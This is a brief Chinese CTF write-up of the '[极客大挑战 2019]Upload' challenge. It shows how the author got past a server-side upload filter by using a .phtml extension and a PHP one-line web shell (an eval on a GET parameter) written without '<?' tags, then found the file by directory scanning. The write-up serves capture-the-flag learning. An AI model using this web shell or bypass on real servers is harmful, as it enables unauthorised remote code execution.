本文详细描述了一次针对文件上传安全性的测试过程。首先,通过禁用JS验证发现拦截发生在服务端,特别是对PHP相关后缀的文件。进一步尝试修改MIME和文件内容,但因文件内容被检查(尤其是PHP标签)而失败。最终,利用PHP的一句话木马代码(不含标准PHP标签)成功上传,并通过目录扫描找到文件位置。该文章突显了服务器端文件上传过滤的重要性以及可能的绕过策略。
[极客大挑战 2019]Upload
直接上传了木马文件,无法上传,先判断一下限制是来自客户端(js)还是服务端(对文件后缀、MIME等的检查)
禁用js之后,再上传一下,还是被拦截了,说明是在服务端进行过滤的。
测试服务端的限制,发现含有 php、php2 的都会被拦截掉,说明这是一个黑名单拦截
又修改了 MIME 进行绕过,依然不行,但是根据提示看就知道,被拦截的原因是文件内容被检查了,存在**<?** 就无法上传成功。
使用 js 执行 php 代码,网上找了一个不用 <? 的php一句话代码,修改一下提交。
<script language='php'>eval($_GET['cmd']);</script>
上传的后缀是 phtml 是为了页面可以正常解析php代码。
PHTML网页是一种包含PHP脚本的网页,PHP脚本镶嵌在网页的HTML代码之中。在页面被发送给请求的用户之前,网页服务器调用PHP解释程序来解释和执行PHP脚本。含有PHP脚本的网页通常都以“.php”、“.php3”或“.phtml”作为后缀。和ASP一样,PHP可以被认为是一种“动态网页”。
使用目录扫描,扫描下 文件上传到了哪个目录下面,一般是 upload、file、upload-file、之类的,一般都可以扫出来。
正常访问到了上传的木马文件,接着连接上找找flag就 ok 了
这 上传了不少文件啊 。
扫一扫
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
